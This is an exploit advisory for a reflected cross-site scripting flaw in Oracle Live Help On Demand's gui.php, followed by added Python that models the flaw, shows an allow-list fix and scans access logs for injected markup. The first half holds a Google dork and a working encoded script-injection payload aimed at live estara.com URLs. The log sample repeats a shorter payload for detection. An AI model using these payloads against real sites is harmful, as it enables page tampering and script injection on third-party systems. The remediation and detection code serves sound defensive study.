# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks: inurl:UI/gui.php
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html

..................................................................

Demo:

http://as00.estara.com/UI/gui.php?accountid=200106284055 [our xss is here]

http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217&timestamp=1234150034

or

https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25&timestamp=1321973587

http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Hi%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:it%27s%20Song..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:What%20Song?%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Uhh%20Ahh%20Yeah%20by%20Dan%20Balan%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Oh,cool..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:p.s.%20I%20found%20xss%20on%20the%20oracle..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Admin:Don%27t%20care,%20i%20like%20this%20song..Uhh%20Ahh%20Yeah!%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Yeah..%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.hampton.gov/youth/images/white_background.png%27%29;}%3C/style%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20black;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://4.bp.blogspot.com/_iHaUzis1v4c/TK_GUArAtqI/AAAAAAAANeU/6vCNrSFQu2E/s640/Ascii_Dance.gif%22%20style=%22height:%20350px;%20width:%20576px;%22%3E%20%3Cobject%20data=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%20type=%22application/x-shockwave-flash%22%20width=%22240%22%20height=%2264%22%3E%3Cparam%20name=%22movie%22%20value=http://htmlka.com/wp-content/uploads/2009/06/webplayer.swf%3E%3Cparam%20name=%22menu%22%20value=%22false%22%3E%20%3Cparam%20name=%22scale%22%20value=%22noscale%22%3E%3Cparam%20name=%22flashvars%22%20value=%22src=/img/uploadimg/20120301/1708350.JPG

Video: http://www.youtube.com/watch?v=og_Ev7glz_g
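The PoC above shows the accountid query parameter being reflected into the gui.php page without output encoding, so a value that starts with a quote and an angle bracket breaks out of the surrounding attribute. The following Python is an added example written for this page; it is not the advisory author's code and not Oracle's gui.php source, which is not shown here. It models the flaw with an assumed attribute-context reflection (render_unescaped), shows the hardened form that allow-lists the numeric shape and attribute-encodes (render_hardened), and runs a log-side detector (scan_access_log) over constructed combined-format access-log lines, one of which carries a shortened breakout of the same shape as the PoC. All function names and the log lines are constructed for illustration.

```python
import re
from html import escape
from urllib.parse import parse_qs, unquote, urlsplit

# ASSUMED model of the flaw: the advisory's payload opens with  ""><  so the
# reflection point is taken to be inside a double-quoted attribute. This is
# not the real gui.php source.
ACCOUNT_ID_RE = re.compile(r"\d{1,20}")


def render_unescaped(accountid: str) -> str:
    """Hypothetical vulnerable reflection: raw interpolation into an attribute."""
    return f'<input type="hidden" name="accountid" value="{accountid}">'


def render_hardened(accountid: str) -> str:
    """Fixed form: allow-list the expected shape, then attribute-encode anyway."""
    if not ACCOUNT_ID_RE.fullmatch(accountid):
        raise ValueError("accountid must be a decimal number")
    return f'<input type="hidden" name="accountid" value="{escape(accountid, quote=True)}">'


def escape_for_attribute(value: str) -> str:
    """Attribute-context encoding: neutralises the quote and bracket characters."""
    return escape(value, quote=True)


# Detection side: flag query parameters whose decoded value carries markup.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(script|style|img|object|iframe|div|svg)\b|javascript:", re.I
)


def suspicious_params(url: str) -> list:
    """Names of query parameters in `url` whose decoded value contains markup."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    hits = set()
    for name, values in qs.items():
        for v in values:
            # parse_qs already decoded once; a second unquote catches
            # %25-double-encoded payloads.
            if MARKUP_RE.search(unquote(v)):
                hits.add(name)
    return sorted(hits)


REQUEST_LINE_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines) -> list:
    """(line number, flagged params) for requests to /UI/gui.php carrying markup."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_LINE_RE.search(line)
        if not m:
            continue
        target = m.group(1)
        if not urlsplit(target).path.endswith("/UI/gui.php"):
            continue
        params = suspicious_params(target)
        if params:
            findings.append((line_no, params))
    return findings


# Constructed sample log lines (not real traffic). The second carries a
# shortened attribute breakout in accountid of the shape the advisory shows.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Feb/2012:10:00:01 +0000] "GET /UI/gui.php?accountid=200106284055&template=314323&referrer=Email HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Feb/2012:10:00:07 +0000] "GET /UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 5180',
    '203.0.113.9 - - [29/Feb/2012:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line_no, params in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: markup in {params}")
    print(render_hardened("200106284055"))
```

The allow-list check is the real fix here: accountid is a numeric identifier, so anything that is not digits can be rejected outright, and the attribute encoding is the second layer for the case where a value legitimately has to carry other characters. The log scanner decodes each parameter before matching, because the PoC arrives fully percent-encoded and a raw substring search for `<script` on the access log would miss it.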